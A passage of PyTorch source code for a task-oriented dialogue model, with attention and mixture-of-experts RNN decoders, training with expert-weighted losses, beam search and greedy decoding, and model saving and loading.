[B,1,T]\n attn_weights = F.softmax(energy, dim=2) # [B,1,T]\n\n # getting context\n context = torch.bmm(attn_weights, encoder_outputs) # [B,1,H]\n\n # context = torch.bmm(attn_weights.unsqueeze(0), encoder_outputs.unsqueeze(0)) #[B,1,H]\n # Combine embedded input word and attended context, run through RNN\n rnn_input = torch.cat((embedded, context), 2)\n rnn_input = rnn_input.transpose(0, 1)\n\n output, hidden = self.rnn(rnn_input, hidden)\n output = output.squeeze(0) # (1,B,V)->(B,V)\n\n output = F.log_softmax(self.out(output), dim=1)\n return output, hidden # , attn_weights\n\n\nclass MoESeqAttnDecoderRNN(nn.Module):\n def __init__(self, embedding_size, hidden_size, output_size, cell_type, k=1, dropout_p=0.1, max_length=30,\n args=None, device=default_device):\n super(MoESeqAttnDecoderRNN, self).__init__()\n # Define parameters\n self.hidden_size = hidden_size\n self.embed_size = embedding_size\n self.output_size = output_size\n self.n_layers = 1\n self.dropout_p = dropout_p\n self.k = k\n self.device = device\n self.args = args\n # pp added: future info size\n self.future_size = self.output_size\n\n # Define layers\n self.embedding = nn.Embedding(output_size, embedding_size)\n self.dropout = nn.Dropout(dropout_p)\n\n if 'bi' in cell_type: # we dont need bidirectionality in decoding\n cell_type = cell_type.strip('bi')\n self.rnn = whatCellType(embedding_size + hidden_size, hidden_size, cell_type, dropout_rate=self.dropout_p)\n self.rnn_f = whatCellType(embedding_size + hidden_size, hidden_size, cell_type, dropout_rate=self.dropout_p) # pp added for future context\n # self.rnn_fp = whatCellType(embedding_size + hidden_size + output_size, hidden_size, cell_type, dropout_rate=self.dropout_p) # pp added for future context\n\n self.moe_rnn = whatCellType(hidden_size * (self.k + 1), hidden_size * (self.k + 1), cell_type,\n dropout_rate=self.dropout_p)\n self.moe_hidden = nn.Linear(hidden_size * (self.k + 1), hidden_size)\n # self.moe_fc = nn.Linear((output_size+hidden_size)*(self.k+1), (self.k+1))\n self.moe_fc = nn.Linear(output_size * (self.k + 1), (self.k + 1))\n # self.moe_fc_hid = nn.Linear(hidden_size*(self.k+1), (self.k+1))\n\n self.out = nn.Linear(hidden_size, output_size)\n self.score = nn.Linear(self.hidden_size + self.hidden_size, self.hidden_size)\n self.attn_combine = nn.Linear(embedding_size + hidden_size, embedding_size)\n\n # attention\n self.method = 'concat'\n self.attn = nn.Linear(self.hidden_size * 2, hidden_size)\n\n # self.attn_fp = 
nn.Linear(self.hidden_size * 2 + self.output_size, hidden_size)\n self.attn_f = nn.Linear(self.hidden_size * 2 + self.future_size, hidden_size)\n self.v = nn.Parameter(torch.rand(hidden_size))\n stdv = 1. / math.sqrt(self.v.size(0))\n self.v.data.normal_(mean=0, std=stdv)\n\n # self.attn_dec_hid = Attn(self.method, hidden_size, self.device)\n\n def expert_forward(self, input, hidden, encoder_outputs):\n if isinstance(hidden, tuple):\n h_t = hidden[0]\n else:\n h_t = hidden\n encoder_outputs = encoder_outputs.transpose(0, 1)\n\n embedded = self.embedding(input) # .view(1, 1, -1)\n # embedded = F.dropout(embedded, self.dropout_p)\n\n # SCORE 3\n max_len = encoder_outputs.size(1)\n h_t_reshaped = h_t.unsqueeze(0) if len(h_t.size()) == 2 else h_t # pp added: make sure h_t is [1,B,D]\n h_t = h_t_reshaped.transpose(0, 1) # [1,B,D] -> [B,1,D]\n h_t = h_t.repeat(1, max_len, 1) # [B,1,D] -> [B,T,D]\n\n energy = self.attn(torch.cat((h_t, encoder_outputs), 2)) # [B,T,2D] -> [B,T,D]\n energy = torch.tanh(energy)\n energy = energy.transpose(2, 1) # [B,H,T]\n v = self.v.repeat(encoder_outputs.size(0), 1).unsqueeze(1) # [B,1,H]\n energy = torch.bmm(v, energy) # [B,1,T]\n attn_weights = F.softmax(energy, dim=2) # [B,1,T]\n\n # getting context\n context = torch.bmm(attn_weights, encoder_outputs) # [B,1,H]\n\n # Combine embedded input word and attended context, run through RNN\n rnn_input = torch.cat((embedded, context), 2)\n rnn_input = rnn_input.transpose(0, 1)\n\n # pp added\n new_hid = h_t_reshaped\n if isinstance(hidden, tuple):\n if len(hidden) == 2:\n new_hid = (h_t_reshaped, hidden[1])\n # elif len(hidden)==1:\n # new_hid = (h_t_reshaped)\n\n output, hidden = self.rnn(rnn_input, new_hid) # hidden to h_t_reshaped\n output = output.squeeze(0) # (1,B,H)->(Batu,H)\n\n output = F.log_softmax(self.out(output), dim=1) # self.out(output)[batch, out_vocab]\n return output, hidden, embedded.transpose(0, 1) # , attn_weights\n\n def moe_layer(self, decoder_output_list, decoder_hidden_list, embedded_list, gamma_expert):\n # output\n chair_dec_out = decoder_output_list[0] # chair\n expert_dec_out_list = decoder_output_list[1:] # experts\n chair_dec_hid = decoder_hidden_list[0] # chair\n expert_dec_hid_list = decoder_hidden_list[1:] # experts\n # 1. only use decoder_output compute weights\n cat_dec_out = torch.cat(decoder_output_list, -1) # (B, (k+1)*V) # Experts\n # 2. 
use both decoder_output & decoder_hidden\n # cat_dec_list = [torch.cat((o, x.squeeze(0)), 1) for o, (x, y) in zip(decoder_output_list, decoder_hidden_list)]\n # cat_dec_out = torch.cat(cat_dec_list, -1)\n # MOE weights computation + normalization ------ Start\n moe_weights = self.moe_fc(cat_dec_out) # [Batch, Intent]\n moe_weights = F.log_softmax(moe_weights, dim=1)\n # moe_weights = F.softmax(moe_weights, dim=1)\n\n # available_m = torch.zeros(moe_weights.size(), device=self.device)\n # i = 0\n # for k in enumerate(decoder_output_list):\n # available_m[:,i] = mask_tensor[k]\n # i += 1\n # moe_weights = available_m * moe_weights\n\n norm_weights = torch.sum(moe_weights, dim=1)\n norm_weights = norm_weights.unsqueeze(1)\n moe_weights = torch.div(moe_weights, norm_weights) # [B, I]\n moe_weights = moe_weights.permute(1, 0).unsqueeze(-1) # [I, B, 1]; debug:[8,2,1]\n # MOE weights computation + normalization ------ End\n # output\n moe_weights_output = moe_weights.expand(-1, -1, decoder_output_list[0].size(-1)) # [I, B, V]; [8,2,400]\n decoder_output_tensor = torch.stack(decoder_output_list) # [I, B, V]\n output = decoder_output_tensor.mul(moe_weights_output).sum(0) # [B, V]; [2, 400]\n # weighting\n output = gamma_expert * output + (1 - gamma_expert) * chair_dec_out # [2, 400]\n # hidden\n moe_weights_hidden = moe_weights.expand(-1, -1, decoder_hidden_list[0][0].size(-1)) # [I, B, H]; [8,2,5]\n if isinstance(decoder_hidden_list[0], tuple): # for lstm\n stack_dec_hid = torch.stack([a.squeeze(0) for a, b in decoder_hidden_list]), torch.stack(\n [b.squeeze(0) for a, b in decoder_hidden_list]) # [I, B, H]\n hidden = stack_dec_hid[0].mul(moe_weights_hidden).sum(0).unsqueeze(0), stack_dec_hid[1].mul(\n moe_weights_hidden).sum(0).unsqueeze(0) # [B, H]\n hidden = gamma_expert * hidden[0] + (1 - gamma_expert) * chair_dec_hid[0], gamma_expert * hidden[1] + (\n 1 - gamma_expert) * chair_dec_hid[1]\n else: # for gru\n stack_dec_hid = torch.stack([a.squeeze(0) for a in decoder_hidden_list])\n hidden = stack_dec_hid[0].mul(moe_weights_hidden).sum(0).unsqueeze(0)\n hidden = gamma_expert * hidden[0] + (1 - gamma_expert) * chair_dec_hid[0]\n hidden = hidden.unsqueeze(0)\n # print('hidden=', hidden.size())\n return output, hidden # output[B, V] -- [2, 400] ; hidden[1, B, H] -- [1, 2, 5]\n\n def tokenMoE(self, decoder_input, decoder_hidden, encoder_outputs, mask_tensor):\n # decoder_input[batch, 1]; decoder_hidden: tuple element is a tensor[1, batch, hidden], encoder_outputs[maxlen_target, batch, hidden]\n # n = len(self.intent_list) # how many intents do we have\n output_c, hidden_c, embedded_c = self.expert_forward(input=decoder_input, hidden=decoder_hidden,\n encoder_outputs=encoder_outputs)\n decoder_output_list, decoder_hidden_list, embedded_list = [output_c], [hidden_c], [embedded_c]\n # decoder_output_list, decoder_hidden_list, embedded_list = [], [], []\n # count = 0\n for mask in mask_tensor: # each intent has a mask [Batch, 1]\n decoder_input_k = decoder_input.clone().masked_fill_(mask,\n value=PAD_model) # if assigned PAD_token it will count loss\n if isinstance(decoder_hidden, tuple):\n decoder_hidden_k = tuple(map(lambda x: x.clone().masked_fill_(mask, value=PAD_model), decoder_hidden))\n else:\n decoder_hidden_k = decoder_hidden.clone().masked_fill_(mask, value=PAD_model)\n encoder_outputs_k = encoder_outputs.clone().masked_fill_(mask, value=PAD_model)\n # test if there's someone not all PADDED\n # if torch.min(decoder_input_k)!=PAD_token or torch.min(decoder_hidden_k[0])!=PAD_token or 
torch.min(decoder_hidden_k[1])!=PAD_token or torch.min(encoder_outputs_k)!=PAD_token:\n # print(decoder_input_k, '\\n', decoder_hidden_k,'\\n', encoder_outputs_k)\n # count += 1\n output_k, hidden_k, embedded_k = self.expert_forward(input=decoder_input_k, hidden=decoder_hidden_k,\n encoder_outputs=encoder_outputs_k)\n\n decoder_output_list.append(output_k)\n decoder_hidden_list.append(hidden_k)\n embedded_list.append(embedded_k)\n\n # print('count=', count) # 10/31 will count for loss\n gamma_expert = self.args.gamma_expert\n decoder_output, decoder_hidden = self.moe_layer(decoder_output_list, decoder_hidden_list, embedded_list,\n gamma_expert)\n # decoder_output = gamma_expert * decoder_output + (1 - gamma_expert) * output_c\n # decoder_hidden = gamma_expert * decoder_hidden + (1 - gamma_expert) * hidden_c\n # output = output.squeeze(0) # (1,B,H)->(B,H)\n # output = F.log_softmax(self.out(output), dim=1) # self.out(output)[batch, out_vocab]\n return decoder_output, decoder_hidden\n\n def pros_expert_forward(self, input, hidden, encoder_outputs, dec_hidd_with_future):\n if isinstance(hidden, tuple):\n h_t = hidden[0]\n else:\n h_t = hidden\n encoder_outputs = encoder_outputs.transpose(0, 1)\n\n embedded = self.embedding(input) # .view(1, 1, -1)\n # embedded = F.dropout(embedded, self.dropout_p)\n\n # SCORE 3\n max_len = encoder_outputs.size(1)\n h_t0 = h_t.transpose(0, 1) # [1,B,D] -> [B,1,D]\n h_t = h_t0.repeat(1, max_len, 1) # [B,1,D] -> [B,T,D]\n\n # pp added: new attn\n energy = self.attn_f(torch.cat((h_t, encoder_outputs, dec_hidd_with_future[:max_len].transpose(0, 1)), 2)) # [B,T,2D] -> [B,T,D]\n energy = torch.tanh(energy)\n energy = energy.transpose(2, 1) # [B,H,T]\n v = self.v.repeat(encoder_outputs.size(0), 1).unsqueeze(1) # [B,1,H]\n energy = torch.bmm(v, energy) # [B,1,T]\n attn_weights = F.softmax(energy, dim=2) # [B,1,T]\n\n # getting context\n context = torch.bmm(attn_weights, encoder_outputs) # [B,1,H]\n\n # Combine embedded input word and attended context, run through RNN\n rnn_input = torch.cat((embedded, context), 2)\n rnn_input = rnn_input.transpose(0, 1)\n output, hidden = self.rnn(rnn_input, hidden) # if self.args.rp_share_rnn else self.rnn_f(rnn_input, hidden)\n output = output.squeeze(0) # (1,B,H)->(B,H)\n\n output = F.log_softmax(self.out(output), dim=1) # self.out(output)[batch, out_vocab]\n return output, hidden, embedded.transpose(0, 1) # , attn_weights\n\n def prospectiveMoE(self, decoder_input, decoder_hidden, encoder_outputs, mask_tensor, dec_hidd_with_future):\n # count = 1\n # print('count=', count)\n output_c, hidden_c, embedded_c = self.pros_expert_forward(decoder_input, decoder_hidden, encoder_outputs,\n dec_hidd_with_future)\n decoder_output_list, decoder_hidden_list, embedded_list = [output_c], [hidden_c], [embedded_c]\n\n for mask in mask_tensor: # each intent has a mask [Batch, 1]\n # count += 1\n # print('count=', count)\n decoder_input_k = decoder_input.clone().masked_fill_(mask,\n value=PAD_model) # if assigned PAD_token it will count loss\n if isinstance(decoder_hidden, tuple):\n decoder_hidden_k = tuple(map(lambda x: x.clone().masked_fill_(mask, value=PAD_model), decoder_hidden))\n else:\n decoder_hidden_k = decoder_hidden.clone().masked_fill_(mask, value=PAD_model)\n encoder_outputs_k = encoder_outputs.clone().masked_fill_(mask, value=PAD_model)\n dec_hidd_with_future_k = dec_hidd_with_future.clone().masked_fill_(mask, value=PAD_model)\n output_k, hidden_k, embedded_k = self.pros_expert_forward(decoder_input_k, decoder_hidden_k,\n 
encoder_outputs_k, dec_hidd_with_future_k)\n\n decoder_output_list.append(output_k)\n decoder_hidden_list.append(hidden_k)\n embedded_list.append(embedded_k)\n\n gamma_expert = self.args.gamma_expert\n decoder_output, decoder_hidden = self.moe_layer(decoder_output_list, decoder_hidden_list, embedded_list,\n gamma_expert)\n return decoder_output, decoder_hidden\n\n def forward(self, input, hidden, encoder_outputs, mask_tensor, dec_hidd_with_future=None):\n if mask_tensor is not None:\n if dec_hidd_with_future is None: # don not use future prediction\n output, hidden = self.tokenMoE(input, hidden, encoder_outputs, mask_tensor)\n else:\n output, hidden = self.prospectiveMoE(input, hidden, encoder_outputs, mask_tensor, dec_hidd_with_future)\n else:\n pass\n output, hidden, _ = self.expert_forward(input, hidden, encoder_outputs)\n return output, hidden # , mask_tensor # , attn_weights\n\n\nclass DecoderRNN(nn.Module):\n def __init__(self, embedding_size, hidden_size, output_size, cell_type, dropout=0.1, device=default_device):\n super(DecoderRNN, self).__init__()\n self.device = device\n self.hidden_size = hidden_size\n self.cell_type = cell_type\n padding_idx = 3\n self.embedding = nn.Embedding(num_embeddings=output_size,\n embedding_dim=embedding_size,\n padding_idx=padding_idx\n )\n if 'bi' in cell_type: # we dont need bidirectionality in decoding\n cell_type = cell_type.strip('bi')\n self.rnn = whatCellType(embedding_size, hidden_size, cell_type, dropout_rate=dropout)\n self.dropout_rate = dropout\n self.out = nn.Linear(hidden_size, output_size)\n\n def forward(self, input, hidden, not_used, mask_tensor=None):\n embedded = self.embedding(input).transpose(0, 1) # [B,1] -> [ 1,B, D]\n embedded = F.dropout(embedded, self.dropout_rate)\n\n output = embedded\n # output = F.relu(embedded)\n\n output, hidden = self.rnn(output, hidden)\n\n out = self.out(output.squeeze(0))\n output = F.log_softmax(out, dim=1)\n\n return output, hidden\n\n\nclass Model(nn.Module):\n def __init__(self, args, input_lang_index2word, output_lang_index2word, input_lang_word2index,\n output_lang_word2index, intent2index=None, index2intent=None, device=default_device):\n super(Model, self).__init__()\n self.args = args\n self.max_len = args.max_len\n\n self.output_lang_index2word = output_lang_index2word\n self.input_lang_index2word = input_lang_index2word\n\n self.output_lang_word2index = output_lang_word2index\n self.input_lang_word2index = input_lang_word2index\n\n # pp added\n self.intent2index, self.index2intent = intent2index, index2intent\n self.k = len(self.intent2index) if self.intent2index else 1\n\n self.hid_size_enc = args.hid_size_enc\n self.hid_size_dec = args.hid_size_dec\n self.hid_size_pol = args.hid_size_pol\n\n self.emb_size = args.emb_size\n self.db_size = args.db_size\n self.bs_size = args.bs_size\n self.cell_type = args.cell_type\n if 'bi' in self.cell_type:\n self.num_directions = 2\n else:\n self.num_directions = 1\n self.depth = args.depth\n self.use_attn = args.use_attn\n self.attn_type = args.attention_type\n\n self.dropout = args.dropout\n self.device = device\n\n self.model_dir = args.model_dir\n self.pre_model_dir = args.pre_model_dir\n self.model_name = args.model_name\n self.teacher_forcing_ratio = args.teacher_ratio\n self.vocab_size = args.vocab_size\n self.epsln = 10E-5\n\n torch.manual_seed(args.seed)\n self.build_model()\n self.getCount()\n try:\n assert self.args.beam_width > 0\n self.beam_search = True\n except:\n self.beam_search = False\n\n self.global_step = 0\n\n def cuda_(self, 
var):\n return var.cuda() if self.args.cuda else var\n\n def build_model(self):\n self.encoder = EncoderRNN(len(self.input_lang_index2word), self.emb_size, self.hid_size_enc,\n self.cell_type, self.depth, self.dropout)\n\n self.policy = policy.DefaultPolicy(self.hid_size_pol, self.hid_size_enc, self.db_size, self.bs_size)\n\n # pp added: intent_type branch\n if self.args.intent_type and self.args.use_moe_model:\n self.decoder = MoESeqAttnDecoderRNN(self.emb_size, self.hid_size_dec, len(self.output_lang_index2word),\n self.cell_type, self.k, self.dropout, self.max_len, self.args)\n elif self.use_attn:\n if self.attn_type == 'bahdanau':\n self.decoder = SeqAttnDecoderRNN(self.emb_size, self.hid_size_dec, len(self.output_lang_index2word),\n self.cell_type, self.dropout, self.max_len)\n else:\n self.decoder = DecoderRNN(self.emb_size, self.hid_size_dec, len(self.output_lang_index2word),\n self.cell_type, self.dropout)\n\n if self.args.mode == 'train':\n self.gen_criterion = nn.NLLLoss(ignore_index=PAD_token,\n reduction='mean') # logsoftmax is done in decoder part\n self.setOptimizers()\n\n # pp added\n self.moe_loss_layer = nn.Linear(1 * (self.k + 1), 1)\n\n def model_train(self, input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor,\n mask_tensor=None, dial_name=None):\n\n proba, _, decoded_sent = self.forward(input_tensor, input_lengths, target_tensor, target_lengths, db_tensor,\n bs_tensor, mask_tensor) # pp added: acts_list\n\n proba = proba.view(-1, self.vocab_size)\n\n self.gen_loss = self.gen_criterion(proba, target_tensor.view(-1))\n\n if self.args.use_moe_loss and mask_tensor is not None: # data separate by intents:\n gen_loss_list = []\n for mask in mask_tensor: # each intent has a mask [Batch, 1]\n target_tensor_i = target_tensor.clone()\n target_tensor_i = target_tensor_i.masked_fill_(mask, value=PAD_token)\n loss_i = self.gen_criterion(proba, target_tensor_i.view(-1))\n gen_loss_list.append(loss_i)\n\n if self.args.learn_loss_weight:\n gen_loss_list.append(self.gen_loss)\n gen_loss_tensor = torch.as_tensor(torch.stack(gen_loss_list), device=self.device)\n self.gen_loss = self.moe_loss_layer(gen_loss_tensor)\n else: # hyper weights\n # lambda_expert = 0.5\n lambda_expert = self.args.lambda_expert\n self.gen_loss = (1 - lambda_expert) * self.gen_loss + \\\n lambda_expert * torch.mean(torch.tensor(gen_loss_list))\n self.loss = self.gen_loss\n self.loss.backward()\n grad = self.clipGradients()\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n # self.printGrad()\n return self.loss.item(), 0, grad\n\n def setOptimizers(self):\n self.optimizer_policy = None\n if self.args.optim == 'sgd':\n self.optimizer = optim.SGD(lr=self.args.lr_rate,\n params=filter(lambda x: x.requires_grad, self.parameters()),\n weight_decay=self.args.l2_norm)\n elif self.args.optim == 'adadelta':\n self.optimizer = optim.Adadelta(lr=self.args.lr_rate,\n params=filter(lambda x: x.requires_grad, self.parameters()),\n weight_decay=self.args.l2_norm)\n elif self.args.optim == 'adam':\n self.optimizer = optim.Adam(lr=self.args.lr_rate,\n params=filter(lambda x: x.requires_grad, self.parameters()),\n weight_decay=self.args.l2_norm)\n\n def retro_forward(self, input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor,\n mask_tensor=None, if_detach=False): # pp added: acts_list\n \"\"\"Given the user sentence, user belief state and database pointer,\n encode the sentence, decide what policy vector construct and\n feed it as the first hiddent state to the decoder.\n 
input_tensor: tensor(batch, maxlen_input)\n target_tensor: tensor(batch, maxlen_target)\n \"\"\"\n\n target_length = target_tensor.size(1) if target_tensor is not None else self.args.max_len\n\n # for fixed encoding this is zero so it does not contribute\n batch_size, seq_len = input_tensor.size()\n\n # ENCODER\n encoder_outputs, encoder_hidden = self.encoder(input_tensor,\n input_lengths) # encoder_outputs: tensor(maxlen_input, batch, 150); encoder_hidden: tuple, each element is a tensor: [1, batch, 150]\n\n # pp added: extract forward output of encoder if use SentMoE and 2 directions\n if self.num_directions == 2 and self.args.SentMoE:\n if isinstance(encoder_hidden, tuple):\n # pp added: forward or backward\n encoder_hidden = encoder_hidden[0][0].unsqueeze(0), encoder_hidden[1][0].unsqueeze(0)\n # encoder_hidden = encoder_hidden[0][1].unsqueeze(0), encoder_hidden[1][1].unsqueeze(0)\n else:\n encoder_hidden = encoder_hidden[0].unsqueeze(0)\n\n # POLICY\n decoder_hidden = self.policy(encoder_hidden, db_tensor, bs_tensor,\n self.num_directions) # decoder_hidden: tuple, each element is a tensor: [1, batch, 150]\n # print('decoder_hidden', decoder_hidden.size())\n # GENERATOR\n # Teacher forcing: Feed the target as the next input\n # _, target_len = target_tensor.size()\n\n decoder_input = torch.as_tensor([[SOS_token] for _ in range(batch_size)], dtype=torch.long,\n device=self.device) # tensor[batch, 1]\n # decoder_input = torch.LongTensor([[SOS_token] for _ in range(batch_size)], device=self.device)\n\n # pp added: calculate new batch size\n proba = torch.zeros(batch_size, target_length, self.vocab_size,\n device=self.device) # tensor[Batch, maxlen_target, V]\n hidd = torch.zeros(batch_size, target_length, self.hid_size_dec, device=self.device)\n\n # generate target sequence step by step !!!\n for t in range(target_length):\n # pp added: moe chair\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs,\n mask_tensor) # decoder_output; decoder_hidden\n\n # use_teacher_forcing = True if random.random() < self.args.teacher_ratio else False # pp added: self.args.SentMoE is False\n # use_teacher_forcing = True if random.random() < self.args.teacher_ratio and self.args.SentMoE is False else False # pp added: self.args.SentMoE is False\n if target_tensor is not None: # if use SentMoE, we should stop teacher forcing for experts\n decoder_input = target_tensor[:, t].view(-1, 1) # [B,1] Teacher forcing\n else:\n # Without teacher forcing: use its own predictions as the next input\n topv, topi = decoder_output.topk(1)\n # decoder_input = topi.squeeze().detach() # detach from history as input\n decoder_input = topi.detach() # detach from history as input\n\n proba[:, t,\n :] = decoder_output # decoder_output[Batch, TargetVocab] # proba[Batch, Target_MaxLen, Target_Vocab]\n # pp added\n if isinstance(decoder_hidden, tuple):\n hidd0 = decoder_hidden[0]\n else:\n hidd0 = decoder_hidden\n hidd[:, t, :] = hidd0\n\n decoded_sent = None\n # pp added: GENERATION\n # decoded_sent = self.decode(target_tensor, decoder_hidden, encoder_outputs, mask_tensor)\n\n if if_detach:\n proba, hidd = proba.detach(), hidd.detach()\n return proba, hidd, decoded_sent\n\n def forward(self, input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor,\n mask_tensor=None): # pp added: acts_list\n\n # if we consider sentence info\n if self.args.SentMoE:\n proba_r, hidd, decoded_sent = self.retro_forward(input_tensor, input_lengths, None, None, db_tensor,\n bs_tensor, 
mask_tensor, if_detach=self.args.if_detach)\n target_length = target_tensor.size(1)\n\n # for fixed encoding this is zero so it does not contribute\n batch_size, seq_len = input_tensor.size()\n\n # ENCODER\n encoder_outputs, encoder_hidden = self.encoder(input_tensor,\n input_lengths) # encoder_outputs: tensor(maxlen_input, batch, 150); encoder_hidden: tuple, each element is a tensor: [1, batch, 150]\n\n # pp added: extract backward output of encoder\n if self.num_directions == 2:\n if isinstance(encoder_hidden, tuple):\n # pp added: forward or backward\n encoder_hidden = encoder_hidden[0][1].unsqueeze(0), encoder_hidden[1][1].unsqueeze(0)\n # encoder_hidden = encoder_hidden[0][0].unsqueeze(0), encoder_hidden[1][0].unsqueeze(0)\n else:\n encoder_hidden = encoder_hidden[1].unsqueeze(0)\n\n # POLICY\n decoder_hidden = self.policy(encoder_hidden, db_tensor, bs_tensor,\n self.num_directions) # decoder_hidden: tuple, each element is a tensor: [1, batch, 150]\n # print('decoder_hidden', decoder_hidden.size())\n\n # GENERATOR\n # Teacher forcing: Feed the target as the next input\n _, target_len = target_tensor.size()\n\n decoder_input = torch.as_tensor([[SOS_token] for _ in range(batch_size)], dtype=torch.long,\n device=self.device) # tensor[batch, 1]\n proba_p = torch.zeros(batch_size, target_length, self.vocab_size,\n device=self.device) # tensor[Batch, maxlen_target, V]\n\n # pp added\n future_info = proba_r if self.args.future_info == 'proba' else hidd\n\n # generate target sequence step by step !!!\n for t in range(target_len):\n # pp added: moe chair\n # decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, mask_tensor, dec_hidd_with_future=future_info.transpose(0, 1)) # decoder_output; decoder_hidden\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, mask_tensor, dec_hidd_with_future=proba_r.transpose(0, 1)) # decoder_output; decoder_hidden\n\n decoder_input = target_tensor[:, t].view(-1, 1) # [B,1] Teacher forcing\n # use_teacher_forcing = True if random.random() < self.args.teacher_ratio else False\n # if use_teacher_forcing:\n # decoder_input = target_tensor[:, t].view(-1, 1) # [B,1] Teacher forcing\n # else:\n # # Without teacher forcing: use its own predictions as the next input\n # topv, topi = decoder_output.topk(1)\n # # decoder_input = topi.squeeze().detach() # detach from history as input\n # decoder_input = topi.detach() # detach from history as input\n\n proba_p[:, t, :] = decoder_output # decoder_output[Batch, TargetVocab]\n\n return proba_p, None, decoded_sent\n else:\n # print('pretrain')\n proba_r, hidd, decoded_sent = self.retro_forward(input_tensor, input_lengths, target_tensor, target_lengths,\n db_tensor, bs_tensor, mask_tensor,\n if_detach=self.args.if_detach)\n return proba_r, None, decoded_sent\n\n def predict(self, input_tensor, input_lengths, target_tensor, target_lengths, db_tensor, bs_tensor,\n mask_tensor=None):\n # pp added\n with torch.no_grad():\n # ENCODER\n encoder_outputs, encoder_hidden = self.encoder(input_tensor, input_lengths)\n\n # POLICY\n decoder_hidden = self.policy(encoder_hidden, db_tensor, bs_tensor, self.num_directions)\n\n # GENERATION\n decoded_words = self.decode(target_tensor, decoder_hidden, encoder_outputs, mask_tensor)\n\n return decoded_words, 0\n\n def decode(self, target_tensor, decoder_hidden, encoder_outputs, mask_tensor=None):\n decoder_hiddens = decoder_hidden\n\n if self.beam_search: # wenqiang style - sequicity\n decoded_sentences = []\n for 
idx in range(target_tensor.size(0)): # idx is the batch index\n\n if isinstance(decoder_hiddens, tuple): # LSTM case\n decoder_hidden = (\n decoder_hiddens[0][:, idx, :].unsqueeze(0), decoder_hiddens[1][:, idx, :].unsqueeze(0))\n else:\n decoder_hidden = decoder_hiddens[:, idx, :].unsqueeze(0)\n encoder_output = encoder_outputs[:, idx, :].unsqueeze(1)\n\n # Beam start\n self.topk = 1\n endnodes = [] # stored end nodes\n number_required = min((self.topk + 1), self.topk - len(endnodes))\n decoder_input = torch.as_tensor([[SOS_token]], dtype=torch.long, device=self.device)\n # decoder_input = torch.LongTensor([[SOS_token]], device=self.device)\n\n # starting node hidden vector, prevNode, wordid, logp, leng,\n node = BeamSearchNode(decoder_hidden, None, decoder_input, 0, 1)\n nodes = PriorityQueue() # start the queue\n nodes.put((-node.eval(None, None, None, None),\n next(unique),\n node))\n\n # start beam search\n qsize = 1\n while True:\n # give up when decoding takes too long\n if qsize > 2000: break\n\n # fetch the best node\n score, _, n = nodes.get() # pp added: _\n decoder_input = n.wordid\n decoder_hidden = n.h\n\n if n.wordid.item() == EOS_token and n.prevNode != None: # its not empty\n endnodes.append((score, n))\n # if reach maximum # of sentences required\n if len(endnodes) >= number_required:\n break\n else:\n continue\n\n # decode for one step using decoder\n # import pdb\n # pdb.set_trace()\n mask_tensor_idx = mask_tensor[:, idx, :].unsqueeze(1) if mask_tensor is not None else None\n decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_output,\n mask_tensor_idx)\n\n log_prob, indexes = torch.topk(decoder_output, self.args.beam_width)\n nextnodes = []\n\n for new_k in range(self.args.beam_width):\n decoded_t = indexes[0][new_k].view(1, -1)\n log_p = log_prob[0][new_k].item()\n\n node = BeamSearchNode(decoder_hidden, n, decoded_t, n.logp + log_p, n.leng + 1)\n score = -node.eval(None, None, None, None)\n nextnodes.append((score, node))\n\n # put them into queue\n for i in range(len(nextnodes)):\n score, nn = nextnodes[i]\n nodes.put((score,\n next(unique),\n nn))\n\n # increase qsize\n qsize += len(nextnodes)\n\n # choose nbest paths, back trace them\n if len(endnodes) == 0:\n endnodes = [(nodes.get()[0], nodes.get()[-1]) for n in range(self.topk)]\n\n utterances = []\n for score, n in sorted(endnodes, key=operator.itemgetter(0)):\n utterance = []\n utterance.append(n.wordid)\n # back trace\n while n.prevNode != None:\n n = n.prevNode\n utterance.append(n.wordid)\n\n utterance = utterance[::-1]\n utterances.append(utterance)\n\n decoded_words = utterances[0]\n decoded_sentence = [self.output_index2word(str(ind.item())) for ind in decoded_words]\n # print(decoded_sentence)\n decoded_sentences.append(' '.join(decoded_sentence[1:-1]))\n\n return decoded_sentences\n\n else: # GREEDY DECODING\n # decoded_sentences = []\n decoded_sentences = self.greedy_decode(decoder_hidden, encoder_outputs, target_tensor, mask_tensor)\n return decoded_sentences\n\n def greedy_decode(self, decoder_hidden, encoder_outputs, target_tensor, mask_tensor=None):\n decoded_sentences = []\n batch_size, seq_len = target_tensor.size()\n # pp added\n decoder_input = torch.as_tensor([[SOS_token] for _ in range(batch_size)], dtype=torch.long, device=self.device)\n # decoder_input = torch.LongTensor([[SOS_token] for _ in range(batch_size)], device=self.device)\n\n decoded_words = torch.zeros((batch_size, self.max_len), device=self.device)\n for t in range(self.max_len):\n 
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, mask_tensor)\n\n topv, topi = decoder_output.data.topk(1) # get candidates\n topi = topi.view(-1)\n\n decoded_words[:, t] = topi\n decoder_input = topi.detach().view(-1, 1)\n\n for sentence in decoded_words:\n sent = []\n for ind in sentence:\n if self.output_index2word(str(int(ind.item()))) == self.output_index2word(str(EOS_token)):\n break\n sent.append(self.output_index2word(str(int(ind.item()))))\n decoded_sentences.append(' '.join(sent))\n\n return decoded_sentences\n\n def clipGradients(self):\n grad = torch.nn.utils.clip_grad_norm_(self.parameters(), self.args.clip)\n return grad\n\n def saveModel(self, iter):\n print('Saving parameters..')\n if not os.path.exists(self.model_dir):\n os.makedirs(self.model_dir)\n\n torch.save(self.encoder.state_dict(), self.model_dir + '/' + self.model_name + '-' + str(iter) + '.enc')\n torch.save(self.policy.state_dict(), self.model_dir + '/' + self.model_name + '-' + str(iter) + '.pol')\n torch.save(self.decoder.state_dict(), self.model_dir + '/' + self.model_name + '-' + str(iter) + '.dec')\n\n with open(self.model_dir + '/' + self.model_name + '.config', 'w') as f:\n json.dump(vars(self.args), f, ensure_ascii=False, indent=4)\n\n def loadModel(self, iter=0):\n print('Loading parameters of iter %s ' % iter)\n self.encoder.load_state_dict(torch.load(self.pre_model_dir + '/' + self.model_name + 